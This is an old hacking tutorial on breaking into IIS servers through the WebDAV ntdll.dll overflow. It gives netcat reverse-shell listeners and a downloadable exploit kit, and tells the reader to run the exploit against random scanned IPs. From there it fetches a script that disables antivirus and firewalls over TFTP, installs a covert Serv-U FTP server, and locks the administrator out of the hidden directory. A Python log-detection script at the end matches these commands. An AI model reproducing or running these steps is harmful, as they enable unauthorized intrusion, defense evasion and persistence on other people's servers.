How to hack a WebDAV vulnerable server, and how to protect it
[LOCKDOWN]: Programs you need:

Servu tools: you can download yourself
Netcat
xwbf-v0.3
Tftp
Virus / Firewall killer

Grab it here: hxxp://leetkrew.host.sk/WebDAVhack.zip

Start a DOS window, go to the folder with nc.exe, and give the following command:

    nc -L -vv -p 666

Then start another DOS window and do:

    nc -L -vv -p 667

OK, if you have done that you will see something like this:

    F:\>nc -L -vv -p 666
    listening on [any] 666 ...

You have just successfully run NetCat. It is now listening and waiting to be changed into a reverse command line (a command line on the other computer).

Start the program xwbf-v0.3 and fill in the following:

    Target      : the IP from your scan
    Port        : 80
    Satan's IP  : Your IP
    Port        : 666
    Custom Pads : (use default)
    Padding     : (use default)

Now all you need is a scan; check if some WebDAV scans are in the scan area. Pick a random IP and enter it into the program. Click on EXPLOIT. You should either see:

    Checking ntdll.dll buffer overflow .....CONNECTED
    sending evil buffer ......VULNERABLE
    Connecting to 'xxx.xxx.39.159' .........CONNECTED
    trying ret addr 0x00d000d0 ......DONE
    Waiting for IIS to restart .........CONNECTED
    trying ret addr 0x00d100d1

or

    Checking ntdll.dll buffer overflow .....CONNECTED
    sending evil buffer ...... NOT VULNERABLE

If it's vulnerable, the program will start checking exploit addresses; when it gets access differs from system to system.

After a while NC.exe should display a CMD window. You have now successfully infiltrated the system and can choose between TFTP and ECHO hacking.

Create your own dir, like:

    mkdir c:\winnt\system32\drivers\dll\

First: Tftp

Start the program, push browse, and select your dir with the files. Then go to the remote shell and do:

    tftp.exe -i YOURIP get kill.bat c:\Winnt\system32\drivers\dll\kill.bat

Navigate to your dir using the simple DOS command:

    cd C:\Winnt\system32\drivers\dll\

Now run KILL.BAT. It will start to disable any virus scanners or firewalls.
When it's finished we'll upload the rest of the files:

    tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon.exe

(I recommend you change the name to something else.)

    tftp.exe -i YOURIP get drvrquery32.exe c:\Winnt\system32\drivers\dll\servudaemon.ini

When TFTP has finished transferring the files, do the following command:

    servudaemon.exe /i /s /h

After that we are going to run the stro by simply using:

    Net start servu

You can now log in to your stro with the desired username and password you specified.

Second method: Echo Hacking

For this you need a seed stro to transfer the files from. Do these commands:

    echo open ipserver portserver >> c:\winnt\system32\drivers\dll\1.txt
    echo user user >> c:\winnt\system32\drivers\dll\1.txt
    echo password >> c:\winnt\system32\drivers\dll\1.txt
    echo lcd c:\winnt\system32\drivers\dll >> c:\winnt\system32\drivers\dll\1.txt
    echo get CommonDlg32.dll >> c:\winnt\system32\drivers\dll\1.txt
    echo get drvrquery32.exe >> c:\winnt\system32\drivers\dll\1.txt
    echo quit >> c:\winnt\system32\drivers\dll\1.txt
    ftp -i -n -v -s:c:\winnt\system32\drivers\dll\1.txt

After doing the FTP command, it will start transferring the files from the stro to your target. What you just did with the commands above is the following: you "echoed" commands into a txt file, then you used FTP to open the txt file and execute its content.

The hack is almost done; only the final step remains, to protect the dir from the admin. Do this:

    cacls c:\winnt\system32\drivers\dll\* /T /E /P Administrator:N
    attrib +S +H c:\winnt\system32\drivers\dll\ /S /D

If that one does not work, do:

    attrib +S +H c:\winnt\system32\drivers\dll\

Now the admin can't see into the dir anymore.

Enjoy Your WebDAV Hack
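On the protection side, the commands in this walkthrough leave recognizable process command lines on the server. The following Python detection sketch is an added example, not part of the original page; the pipe-delimited log format (time|parent image|command line), the rule names and the sample events are constructed assumptions.

```python
import re

# Parent images treated as the web server; an assumption of this example
# (inetinfo.exe hosts IIS 5.x, w3wp.exe is the worker on later versions).
WEB_PARENTS = {"inetinfo.exe", "w3wp.exe"}

# One rule per command family used in the walkthrough above. Rule names
# are hypothetical labels, not identifiers from any product.
RULES = [
    ("tftp_download", re.compile(r"\btftp(\.exe)?\s+-i\s+\S+\s+get\s", re.I)),
    ("ftp_script", re.compile(r"\bftp(\.exe)?\s.*-s:\S+", re.I)),
    ("acl_lockout", re.compile(r"\bcacls(\.exe)?\s.*/P\s+\S+:N\b", re.I)),
    ("hide_system_dir", re.compile(
        r"\battrib(\.exe)?\s+(?=.*\+S\b)(?=.*\+H\b).*\\system32\\", re.I)),
]

def scan(lines):
    """Return (line_number, rule_name) for every hit, in input order."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split("|", 2)
        if len(parts) != 3:          # skip malformed records
            continue
        _, parent, cmdline = parts
        # A command shell whose parent is the web server is the strongest
        # single signal: the server process should never spawn cmd.exe.
        if parent.lower() in WEB_PARENTS and re.match(r"cmd(\.exe)?\b", cmdline, re.I):
            hits.append((n, "shell_from_web_server"))
        hits.extend((n, name) for name, rx in RULES if rx.search(cmdline))
    return hits

# Constructed sample events (documentation IP range, invented timestamps).
SAMPLE = r"""2003-04-01T10:00:01|services.exe|inetinfo.exe
2003-04-01T10:02:13|inetinfo.exe|cmd.exe
2003-04-01T10:02:40|cmd.exe|tftp.exe -i 192.0.2.10 get kill.bat c:\Winnt\system32\drivers\dll\kill.bat
2003-04-01T10:03:02|cmd.exe|ftp -i -n -v -s:c:\winnt\system32\drivers\dll\1.txt
2003-04-01T10:03:30|cmd.exe|cacls c:\winnt\system32\drivers\dll\* /T /E /P Administrator:N
2003-04-01T10:03:41|cmd.exe|attrib +S +H c:\winnt\system32\drivers\dll\ /S /D
2003-04-01T10:05:00|explorer.exe|attrib +R c:\docs\report.doc
2003-04-01T10:06:00|explorer.exe|ftp ftp.example.com""".splitlines()

if __name__ == "__main__":
    for n, rule in scan(SAMPLE):
        print(f"line {n}: {rule}")
```

The echo steps do not appear here because echo is a cmd.exe built-in and creates no process of its own; the script file they build is caught when ftp is launched with -s:.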